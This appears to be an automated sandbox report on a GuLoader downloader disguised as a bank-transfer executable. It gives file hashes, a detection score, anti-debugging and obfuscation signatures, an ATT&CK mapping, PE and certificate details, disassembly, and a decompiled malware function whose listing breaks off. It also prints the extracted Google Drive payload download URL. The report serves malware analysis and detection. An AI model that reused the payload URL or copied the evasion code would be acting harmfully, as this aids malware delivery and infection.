Windows Analysis Report Transferencia_29_11_2021 17.03.39.exe

Overview

General Information

Sample Name:Transferencia_29_11_2021 17.03.39.exe
Analysis ID:532136
MD5:a70cf8fdf5c68e414bad4494a44f272a
SHA1:4a974930db625492a8aa3f046759db6f3f057129
SHA256:dd7883497ba8fc4a8fac606d4f3cec70b6d42c0017e320f9becb071d899c6c30
Tags:exe, signed
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
PE / OLE file has an invalid certificate
Contains functionality to call native functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Detected potential crypto function

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    AV Detection:

    Found malware configuration
    Source: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje"}
    Source: Transferencia_29_11_2021 17.03.39.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor, URLs: https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://ocsp.digicert.com0C
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://ocsp.digicert.com0O
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: http://www.digicert.com/CPS0
    Source: Transferencia_29_11_2021 17.03.39.exe, String found in binary or memory: https://www.digicert.com/CPS0

    System Summary:

    Potential malicious icon found
    Source: initial sample, Icon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: Transferencia_29_11_2021 17.03.39.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: Transferencia_29_11_2021 17.03.39.exe, Static PE information: invalid certificate
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FD800 NtAllocateVirtualMemory,0_2_020FD800
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FD025 NtAllocateVirtualMemory,0_2_020FD025
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.883074798.0000000002AA0000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameoutrunner.exeFE2XU vs Transferencia_29_11_2021 17.03.39.exe
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000000.357361914.0000000000424000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameoutrunner.exe vs Transferencia_29_11_2021 17.03.39.exe
    Source: Transferencia_29_11_2021 17.03.39.exe, Binary or memory string: OriginalFilenameoutrunner.exe vs Transferencia_29_11_2021 17.03.39.exe
    Source: Transferencia_29_11_2021 17.03.39.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Process Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_02106751 0_2_02106751
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FD800 0_2_020FD800
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FD2A9 0_2_020FD2A9
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020F177F 0_2_020F177F
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_02104B64 0_2_02104B64
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020F97F8 0_2_020F97F8
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FD025 0_2_020FD025
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_021048F5 0_2_021048F5
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_021035B4 0_2_021035B4
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FE1A3 0_2_020FE1A3
    Source: Transferencia_29_11_2021 17.03.39.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: classification engine, Classification label: mal68.rans.troj.winEXE@1/0@0/0
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match, File source: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_00404857 push cs; ret 0_2_00404858
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_00405D21 push E5BAE958h; ret 0_2_00405D26
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FD800 push ds; iretd 0_2_020FE17E
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020F0A0B push es; retf 29E3h 0_2_020FFBC8
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020F4170 push ds; iretd 0_2_020F4171
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FCF30 rdtsc 0_2_020FCF30
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_02104B64 mov eax, dword ptr fs:[00000030h] 0_2_02104B64
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_021027CD mov eax, dword ptr fs:[00000030h] 0_2_021027CD
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FC46B mov eax, dword ptr fs:[00000030h] 0_2_020FC46B
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_02103111 mov eax, dword ptr fs:[00000030h] 0_2_02103111
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_020FCF30 rdtsc 0_2_020FCF30
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe, Code function: 0_2_02106751 RtlAddVectoredExceptionHandler,0_2_02106751
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.882623015.0000000000C80000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.882623015.0000000000C80000.00000002.00020000.sdmp, Binary or memory string: Progman
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.882623015.0000000000C80000.00000002.00020000.sdmp, Binary or memory string: &Program Manager
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.882623015.0000000000C80000.00000002.00020000.sdmp, Binary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 1 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | System Information Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    Transferencia_29_11_2021 17.03.39.exe | 9% | ReversingLabs | Win32.Downloader.GuLoader

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    Source | Detection | Scanner | Label
    0.0.Transferencia_29_11_2021 17.03.39.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1140082
    0.2.Transferencia_29_11_2021 17.03.39.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1140082

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:532136
    Start date:01.12.2021
    Start time:18:59:22
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 7m 48s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Transferencia_29_11_2021 17.03.39.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:20
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.rans.troj.winEXE@1/0@0/0
    EGA Information:Failed
    HDC Information:
    • Successful, ratio: 53.3% (good quality ratio 17.2%)
    • Quality average: 19.8%
    • Quality standard deviation: 31.1%
    HCA Information:Failed
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for sample files taking high CPU consumption
    Warnings:
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
    • Excluded IPs from analysis (whitelisted): 23.211.6.115
    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
    • Not all processes where analyzed, report is missing behavior information

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    No created / dropped files found

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):5.216110090959714
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.15%
    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:Transferencia_29_11_2021 17.03.39.exe
    File size:152688
    MD5:a70cf8fdf5c68e414bad4494a44f272a
    SHA1:4a974930db625492a8aa3f046759db6f3f057129
    SHA256:dd7883497ba8fc4a8fac606d4f3cec70b6d42c0017e320f9becb071d899c6c30
    SHA512:7279f30ac01665f31e4dd4ff11fb85954d9109953e1d3b041971cba8973e6b640eca8794223a5be3762d1911889ba12fc8b84c952b49f002f98f1e79ba6eb273
    SSDEEP:1536:4JE6l7m717UopmGeFgk1hG6dvlWOCQe1FpVfBRnOmk:KE6l7mh/UFgk1hG6GOC/lf2mk
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....7.K.....................0............... ....@................

    File Icon

    Icon Hash:20047c7c70f0e004

    Static PE Info

    General

    Entrypoint:0x401888
    Entrypoint Section:.text
    Digitally signed:true
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    DLL Characteristics:
    Time Stamp:0x4B9437E6 [Sun Mar 7 23:33:58 2010 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:b209c8634733456633136bfedc71877a

    Authenticode Signature

    Signature Valid:false
    Signature Issuer:E=ansvarslsere@Episcotister1.BON, CN=INDDRIVNING, OU=sporuloid, O=atomkraftvrks, L=Capsheaf, S=Appointed, C=CD
    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
    Error Number:-2146762487
    Not Before, Not After
    • 12/1/2021 3:06:33 AM 12/1/2022 3:06:33 AM
    Subject Chain
    • E=ansvarslsere@Episcotister1.BON, CN=INDDRIVNING, OU=sporuloid, O=atomkraftvrks, L=Capsheaf, S=Appointed, C=CD
    Version:3
    Thumbprint MD5:29DB6066933764E6DBF96BB776031AF3
    Thumbprint SHA-1:7F5DF2711E99DDB2A16381EF8330D115FB1C72B2
    Thumbprint SHA-256:B038217303FB0C77E03FB5D245BB31AF36E8932DBBB944A0599B9F5ECB20D07C
    Serial:00

    Entrypoint Preview

    Instruction
    push 004019CCh
    call 00007FC448DAE9B5h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    xor byte ptr [eax], al
    add byte ptr [eax], al
    inc eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [88474D5Dh], dh
    dec edx
    mov byte ptr [6CC034C0h], al
    jnle 00007FC448DAE9BFh
    push cs
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add dword ptr [eax], eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    push ebp
    dec esi
    inc edx
    dec edi
    dec esp
    inc esp
    inc ebp
    dec esi
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    dec esp
    xor dword ptr [eax], eax
    add byte ptr [edx-7BDFC270h], bh
    jmp 00007FC448DAE9F1h
    dec ebp
    cmp byte ptr [ebx-29h], FFFFFFE3h
    je 00007FC448DAEA19h
    pop ebp
    adc esp, dword ptr [ebx-3Dh]
    xchg eax, esi
    mov bh, dl
    mov al, byte ptr [E3B79F4Fh]
    or cl, byte ptr [edx+ebp*4+4F3A977Ah]
    lodsd
    xor ebx, dword ptr [ecx-48EE309Ah]
    or al, 00h
    stosb
    add byte ptr [eax-2Dh], ah
    xchg eax, ebx
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    pop eax
    add byte ptr [eax], al
    add byte ptr [ebx+00h], dl
    add byte ptr [eax], al
    add byte ptr [edi], al
    add byte ptr [edx+79h], ah
    jc 00007FC448DAEA3Dh
    outsb
    add byte ptr [41001001h], cl
    jnc 0000EA2Eh
    jnc 00007FC448DAEA2Ch

    Data Directories

    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x213d4 | 0x28 | .text
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24000 | 0x960 | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x24000 | 0x1470 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x234 | .text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

    Sections

    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x1000 | 0x20ac4 | 0x21000 | False | 0.366751006155 | data | 5.29953521895 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .data | 0x22000 | 0x122c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc | 0x24000 | 0x960 | 0x1000 | False | 0.175048828125 | data | 2.0387904916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    Name | RVA | Size | Type | Language | Country
    RT_ICON | 0x24830 | 0x130 | data | |
    RT_ICON | 0x24548 | 0x2e8 | data | |
    RT_ICON | 0x24420 | 0x128 | GLS_BINARY_LSB_FIRST | |
    RT_GROUP_ICON | 0x243f0 | 0x30 | data | |
    RT_VERSION | 0x24150 | 0x2a0 | data | Chinese | Taiwan

    Imports

    DLL | Import
    MSVBVM60.DLL | __vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

    Version Infos

    Description | Data
    Translation | 0x0404 0x04b0
    LegalCopyright | Union
    InternalName | outrunner
    FileVersion | 4.00
    CompanyName | Union
    LegalTrademarks | Union
    ProductName | Union
    ProductVersion | 4.00
    FileDescription | Union
    OriginalFilename | outrunner.exe

    Possible Origin

    Language of compilation system | Country where language is spoken
    Chinese | Taiwan

    Network Behavior

    No network behavior found

    Code Manipulations

    System Behavior

    General

    Start time:19:00:26
    Start date:01/12/2021
    Path:C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe"
    Imagebase:0x400000
    File size:152688 bytes
    MD5 hash:A70CF8FDF5C68E414BAD4494A44F272A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Visual Basic
    Yara matches:
    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Author: Joe Security
    Reputation:low

    Disassembly

    Code Analysis

      Executed Functions

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID: }v{i
      • API String ID: 0-281594494
      • Opcode ID: 4abb04358c9085ad25bc2903fd0b4b0b7361b47ab56ec62e64353b72e915be66
      • Instruction ID: e2827f86cf3b2730ee0f0d0c928f0d849576f1f1a17aa024a79c4ac80f532284
      • Opcode Fuzzy Hash: 4abb04358c9085ad25bc2903fd0b4b0b7361b47ab56ec62e64353b72e915be66
      • Instruction Fuzzy Hash: F691F471644244CFDB35DE29CDD87EA77A3AF99350F51812ADC098F398D7B09A42CB41
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID:
      • API String ID: 2167126740-0
      • Opcode ID: a2c4708fa71904a784c96a8db9633b3859b63441bd3cd0b2340a7f928f557050
      • Instruction ID: ec61012113a5afb0741ee643f4b36071138c6d1cae8c1d76fd4ea710a34ba2e0
      • Opcode Fuzzy Hash: a2c4708fa71904a784c96a8db9633b3859b63441bd3cd0b2340a7f928f557050
      • Instruction Fuzzy Hash: 5FF113300843855FC6E5AE69998D2EC3FA2EF11F79B44074BCB74069F5DB230286E65B
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • NtAllocateVirtualMemory.NTDLL ref: 020FDB97
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID:
      • API String ID: 2167126740-0
      • Opcode ID: 46022d4da9e175a44629a49850d5ef4d1e78caaa43d9ce5536aa0402c1bd551d
      • Instruction ID: 179ad3a8b60d67ac78b426d6109514e5e92f097dec09f7aad32c2bcc84bc8b9b
      • Opcode Fuzzy Hash: 46022d4da9e175a44629a49850d5ef4d1e78caaa43d9ce5536aa0402c1bd551d
      • Instruction Fuzzy Hash: E9E108300943845FC6F5AE69998D6DC3FA2FB11B38F49074ACB70469F5CB6212C8E65B
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 71%
      			E0041C1E4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
      				signed int _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				char _v40;
      				signed int _v44;
      				void* _v48;
      				short _v52;
      				short* _v64;
      				char _v76;
      				short _v84;
      				void* _v88;
      				short _v92;
      				void* _v96;
      				intOrPtr _v100;
      				short _v104;
      				void* _v108;
      				void* _v112;
      				char _v128;
      				short _v132;
      				intOrPtr _v136;
      				void* _v140;
      				char _v144;
      				signed int _v148;
      				signed int _v152;
      				signed int _v156;
      				signed int _v160;
      				signed int _v164;
      				char _v168;
      				long long _v176;
      				char _v184;
      				intOrPtr _v192;
      				char _v200;
      				intOrPtr _v208;
      				char _v216;
      				intOrPtr _v224;
      				char _v232;
      				long long _v240;
      				char _v248;
      				char _v264;
      				char* _v272;
      				char _v280;
      				char _v332;
      				signed int _v336;
      				signed int _v340;
      				void* _v344;
      				signed int _v348;
      				char _v352;
      				char _v356;
      				char _v360;
      				char _v364;
      				long long _v368;
      				long long _v376;
      				signed int _v380;
      				signed int _v384;
      				signed int _v388;
      				signed int _v392;
      				signed int _v404;
      				signed int _v408;
      				signed int _v412;
      				signed int _v416;
      				signed int _v420;
      				signed int _v424;
      				signed int _v428;
      				signed int _v432;
      				intOrPtr* _v436;
      				signed int _v440;
      				signed int _v444;
      				signed int _v448;
      				signed int _v452;
      				signed int _v456;
      				signed int _v460;
      				signed int _v464;
      				signed int _v468;
      				signed int _v472;
      				signed int _v476;
      				signed int _v480;
      				signed int _v484;
      				signed int _v488;
      				signed int _v492;
      				signed int _v496;
      				signed int _v500;
      				signed int _v504;
      				char* _t658;
      				signed short _t659;
      				signed int _t671;
      				char* _t675;
      				short _t676;
      				short _t685;
      				short _t695;
      				signed int _t704;
      				signed int _t707;
      				signed int _t708;
      				signed int _t712;
      				char* _t713;
      				signed int _t720;
      				signed int _t722;
      				signed int _t723;
      				signed int _t731;
      				signed int _t732;
      				signed int _t737;
      				signed int _t738;
      				signed int _t741;
      				signed int _t743;
      				signed int _t745;
      				char* _t747;
      				signed int _t761;
      				signed int* _t762;
      				signed int _t771;
      				char* _t772;
      				char* _t776;
      				signed int _t780;
      				signed int _t797;
      				signed int _t802;
      				char* _t808;
      				char* _t819;
      				signed int _t822;
      				signed int _t827;
      				signed int* _t832;
      				signed int _t836;
      				signed char _t842;
      				signed int _t845;
      				char* _t848;
      				signed int _t849;
      				char* _t853;
      				char* _t854;
      				signed int _t857;
      				signed int _t865;
      				char* _t874;
      				signed int* _t879;
      				short _t882;
      				signed int _t883;
      				signed int _t885;
      				signed int _t887;
      				signed int _t889;
      				char* _t891;
      				short _t892;
      				signed int _t897;
      				signed int _t899;
      				signed int _t901;
      				short _t903;
      				signed int _t904;
      				signed int _t906;
      				signed int _t908;
      				signed int _t909;
      				signed int _t910;
      				signed int _t912;
      				signed int _t914;
      				signed int _t915;
      				signed int _t921;
      				signed int _t926;
      				char* _t932;
      				signed int _t989;
      				signed int _t999;
      				signed int _t1004;
      				signed int _t1010;
      				signed int _t1015;
      				void* _t1065;
      				void* _t1067;
      				intOrPtr _t1068;
      				void* _t1069;
      				void* _t1070;
      				void* _t1082;
      				long long _t1086;
      
      				_t1068 = _t1067 - 0xc;
      				 *[fs:0x0] = _t1068;
      				L00401540();
      				_v16 = _t1068;
      				_v12 = 0x401260;
      				_v8 = _a4 & 0x00000001;
      				_a4 = _a4 & 0xfffffffe;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t1065);
      				_push(2);
      				_push(0x4029b0);
      				_push( &_v76);
      				L0040186A();
      				_v272 = L"Hjortens";
      				_v280 = 8;
      				L0040184C();
      				_push( &_v184);
      				_push( &_v200);
      				L00401852();
      				_push( &_v200);
      				_t658 =  &_v144;
      				_push(_t658);
      				L00401858();
      				_push(_t658);
      				L0040185E();
      				_v208 = _t658;
      				_v216 = 8;
      				_t659 =  &_v216;
      				_push(_t659);
      				L00401864();
      				asm("sbb eax, eax");
      				_v380 =  ~( ~_t659 + 1);
      				_t932 =  &_v144;
